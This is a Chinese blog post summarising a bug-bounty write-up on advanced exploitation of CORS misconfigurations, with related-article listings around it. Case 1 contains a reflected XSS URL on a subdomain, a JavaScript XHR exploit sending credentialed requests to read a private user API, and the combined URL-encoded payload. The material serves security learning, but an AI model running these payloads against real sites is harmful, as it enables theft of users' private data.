CORS误配置高级利用技巧两例

最新推荐文章于 2024-07-11 15:38:00 发布
最新推荐文章于 2024-07-11 15:38:00 发布
阅读量586 收藏
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/90288088
版权

原文:https://medium.com/@sandh0t/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397
参考:https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties
https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/

Case 1

作者首先找到一个HackerOne上的bugbounty,由于隐私原因,这里将其设置为:www.redacted.com
已经找到CORS误配置了

GET /api/return HTTP/1.1
Host: www.redacted.com
Origin: evil.redacted.com
Connection: close

HTTP/1.1 200 OK
Access-control-allow-credentials: true
 Access-control-allow-origin: evil.redacted.com

这个API是用来展示用户隐私信息,如全名,邮箱等的。
但是想要真的利用这个漏洞,需要结合一个废弃的子域名(Subdomain Takeover),或者找到一个子域的XSS。
然而找到一个废弃的子域名并不简单,所以就只能考虑找子域的XSS了,但是这个BB上写了,BB奖励只限定于ww.redacted.com。但是为了利用这个CORS误配置,只能这样了,不给钱就不给钱吧,能最终利用这个CORS误配置就行。
然后又想,觉得既然其他子域不在奖励范围,那么很大概率其他人就不会去挖其他子域的XSS了,这样想就感觉有信心了。

然后后来又找到了其子域banques.redacted.com的XSS:

https://banques.redacted.com/choice-quiz?form_banque="><script>alert(document.domain)</script>&form_cartes=73&iframestat=1

复现

然后就是将CORS误配置的exploit

function cors() {  
var xhttp = new XMLHttpRequest();  
xhttp.onreadystatechange = function() {    
    if (this.status == 200) {    
    alert(this.responseText);      //要的就是这个responseText
    document.getElementById("demo").innerHTML = this.responseText;    
    }  
};  
xhttp.open("GET", "https://www.redacted.com/api/return", true);  
xhttp.withCredentials = true;  
xhttp.send();
}
cors();

替换XSS的payload:

alert(document.domain)

替换之后是这样的:

https://banques.redacted.com/choice-quiz?form_banque="><script>function%20cors(){var%20xhttp=new%20XMLHttpRequest();xhttp.onreadystatechange=function(){if(this.status==200) alert(this.responseText);document.getElementById("demo").innerHTML=this.responseText}};xhttp.open("GET","https://www.redacted.com/api/return",true);xhttp.withCredentials=true;xhttp.send()}cors();</script>&form_cartes=73&iframestat=1

然后作者就拿到了隐私信息:

Case:#2

无需子域名接管和XSS的利用方式。
找到

这个是https://client.amplifi.com/api/user/的接口,其中的Allow Origin对所有ubnt.com的子域加白了。
这里可以使用一个高级CORS误配置利用技术(我也没看):https://www.corben.io/advanced-cors-techniques/

caiqiiqi
关注
专栏目录
关于CORS利用的一些方法
m0_48520508的博客
07-17 1112
嗨,大家好 我叫Ayoub,我是摩洛哥的安全研究员。在本文中,我将描述两种如何利用CORS配置的情况:第一种情况基于XSS,需要在范围之外进行思考,第二种情况是基于高级CORS利用技术。 注意:在开始阅读本文之前,您需要对CORS是什么以及如何利用配置有基本的了解。以下是一些很棒的帖子,可让你了解他的用法: https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/ https
黑马程序员ssm总结[大全版本,有对应pdf+源码](spring->springmvc-->springboot-->maven高级->cloud微服务)
m0_67402125的博客
07-30 779
既可以解决多个应用间配置共享的问题,
Python-CORStest一个简单的CORS配置检查器
08-10
CORStest 一个简单的CORS配置检查器
高级CORS利用技术
在前端路上
01-15 348
原文地址:https://www.corben.io/advanced-cors-techniques/ 作者:Corben Leo,原文发表于2018年6月16号 自豪地采用谷歌翻译,有英文阅读能力,尽量去阅读原文吧。 序言 我看过 Linus Sarud 和 Bo0oM 做的一些关于Safari 浏览器如何滥用特殊字符的研究。 https://labs.detectify.com/201...
CORS 报错】跨域请求问题:CORS 多种环境下的解决方案
最新发布
Allen-
07-11 5266
CORS问题是前端开发中常见的一个挑战,但通过合理的代理配置和服务器设置可以有效解决。在不同环境下,可以使用Vite的代理功能、设置请求头、JSONP、服务器端代理、Nginx代理等多种方式来解决跨域问题。
不安全CORS配置
qq_43893277的博客
05-09 502
识别CORS策略:使用浏览器的开发者工具检查目标网站的响应头,看是否有Access-Control-Allow-Origin字段。测试Origin头部:使用工具如curl或者浏览器扩展(如Chrome的CORS插件),修改请求的Origin头部,模拟不同源的请求,检查响应头中是否包含Access-Control-Allow-Origin,确认其值是否过于宽松。
cors的使用
m0_72231852的博客
12-31 549
CORS是一种机制,它使得浏览器可以向不同域名的服务器发送XMLHttpRequest请求。在默认情况下,浏览器会阻止这种跨域请求,以保护用户的安全。但是,如果服务器允许跨域请求,那么浏览器就可以正常发送请求并接收响应。当浏览器遇到跨域请求时,它会先发送一个预检请求(OPTIONS请求),以确定服务器是否允许该请求。如果服务器返回的响应中没有包含正确的CORS配置信息,那么浏览器就会抛出一个错CORS(跨域资源共享)是一种Web标准,它允许浏览器向跨源服务器发送XMLHttpRequest请求。
【前端技术整合】Spring与前端技术整合:Angular、React与Vue的实战技巧
[【前端技术整合】Spring与前端技术整合:Angular、React与Vue的实战技巧](https://zuminternet.github.io/images/portal/post/2018-08-23-ZUM-Pilot-partjun/development.jpg) # 1. Spring框架简介与前端技术概述 ...
面试分享:两年工作经验成功面试阿里P6总结
weixin_45556713的博客
09-12 5985
前言 本文主要给大家带来一些我面试的经历和经验,希望对正在求职的同学有所帮助。我先大致说下面试之前的个人情况:2017年7月正式入职海康威视数字技术股份有限公司,使用Vue.js技术栈。 我写的篇幅可能有点长,如果只想看成功的面试请直接从阿里企业智能事业部(一面)开始,大家见谅哈。 这里推荐阅读之前写的文章(前面两篇实用型,后面两篇对面试应该会有帮助): Vue CLI 3结合Lerna进行UI框...
基于 qiankun 的微前端最佳实践(万字长文) - 从 0 到 1 篇
mingyuanyunlian的博客
09-24 2102
写在开头 微前端系列文章: 基于 qiankun 的微前端最佳实践(万字长文) - 从 0 到 1 篇 基于 qiankun 的微前端最佳实践(图文并茂) - 应用间通信篇 基于 qiankun 的微前端最佳实践(图文并茂) - 应用部署篇 万字长文+图文并茂+全面解析微前端框架 qiankun 源码 - qiankun 篇 本系列其他文章计划一到两个月内完成,点个 关注 不迷路。 计划如下: 生命周期篇; IE 兼容篇; 性能优化、缓存方案篇; 引言 大家好~ 本文是基于 qiankun 的微前.
2021年最新Web前端面试题精选大全及答案
emgexgb_sef的博客
03-07 763
目录 HTML、CSS相关 Javascript相关 三者的异同 Vue相关 55.Vue路由懒加载(按需加载路由) React相关 react 生命周期函数 ******为什么虚拟 dom 会提高性能?(必考) (组件的)状态(state)和属性(props)之间有何不同 shouldComponentUpdate 是做什么的 react diff 原理 何为受控组件 调用 super(props) 的目的是什么 React 中构建组件的方式 小程序相关的 其他 企业中的项目流程 奇葩问题 HTML、C
CORS漏洞利用检测和利用方式
weixin_30245867的博客
07-21 5835
  CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。 检测方式:   1.curl访问网站     curl https://www.huasec.com -H "Origin: https://test.com" -I   检查返回包的 Access-C...
漏洞分析 | CORS讲解与实战利用
zkaqlaoniao的博客
04-17 1721
CORS,跨域资源共享(Cross-origin resource sharing),这种机制通过添加HTTP字段的方式规定服务器资源允许被哪些域访问(Access-Control-Allow-Origin)、请求中是否允许发送cookie(Access-Control-Allow-Credentials)、哪些请求类型是被允许的(Access-Control-Request-Method)等等。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
CORS讲解
weixin_33775582的博客
05-08 141
跨域资源共享(CORS) 是一种机制,它使用额外的HTTP头来告诉浏览器 让运行在一个 origin (domain) 上的Web应用被准许访问来自不同源服务器上的指定的资源。当一个资源从与该资源本身所在的服务器不同的域、协议或端口请求一个资源时,资源会发起一个跨域 HTTP 请求。 什么情况下需要 CORS ? XMLHttpRequest或Fetch...
跨域访问方法介绍(7)--使用 CORS
chinaherolts2008的博客
07-05 597
CORS 是一个 W3C 标准,全称是"跨域资源共享"(Cross-origin resource sharing)。它允许浏览器向跨源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制。本文主要介绍 CORS 的基本使用,文中所使用到的软件版本:Chrome90.0.4430.212、jquery 1.12.4,Spring Boot2.4.4、jdk1.8.0_181。 1、CORS 简介 CORS 需要浏览器和服务器同时支持。目前,所有浏览器都支持该功能..
CORS原理及详细使用(转载)
友人C君的博客
05-02 6397
CORS:全称"跨域资源共享"(Cross-origin resource sharing)。 CORS需要浏览器和服务器同时支持,才可以实现跨域请求,目前几乎所有浏览器都支持CORS,IE则不能低于IE10。CORS的整个过程都由浏览器自动完成,前端无需做任何设置,跟平时发送ajax请求并无差异。so,实现CORS的关键在于服务器,只要服务器实现CORS接口,就可以实现跨域通信。 请求类型:...
cors漏洞 复现_BUG赏金 | 关于CORS的一些高级技能
weixin_42298062的博客
02-06 491
本文非常有趣,感兴趣学习的可以花点时间往下看。对于很熟悉或非常熟悉CORS的人来说,直接翻到最下面动动手指点点广告就可以关闭了,谢谢支持!本文翻译自Medium https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397嗨,各位好!我叫A...
【JavaScript】CORS(跨源资源共享)
好久不见的流星
02-25 1890
CORS是现代跨域解决方案的核心,通过在服务端设置响应头,实现了在浏览器中安全、可控地进行跨域请求。了解CORS的原理和使用步骤,对于处理跨域问题至关重要。在使用CORS时,注意设置合适的CORS头,处理带凭据的请求,以及对预检请求的正确响应。希望通过本篇博客,你对CORS有了更深入的了解,并能够在实际项目中应用这一现代跨域解决方案。
出于安全考虑,千万不要绕开 CORS
CSDN资讯
08-06 3471
Mac Zoom 漏洞的曝出将 CORS(跨源资源分享,Cross Origin Resource Sharing)拉入了大众视野,但是坦白地讲,“不了解 CORS 的 Web 开发人员实在太多了”——无论是新手还是经验丰富的开发人员。 那么是因为 CORS API 过于复杂和混乱?还是说开发者需要围绕 CORS 和 CSP 等问题对开发人员展开更好的教育?......无论是何种情况,这都不...
Springboot全解:CORS跨域配置实战
通常,这里会添加一个或多个路径前缀,如`"/api/"`,以确保只对特定的API接口应用CORS配置。 总结来说,Springboot的CORS设置是通过创建一个配置类和`CorsFilter` bean来实现的,通过`CorsConfiguration`对象可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值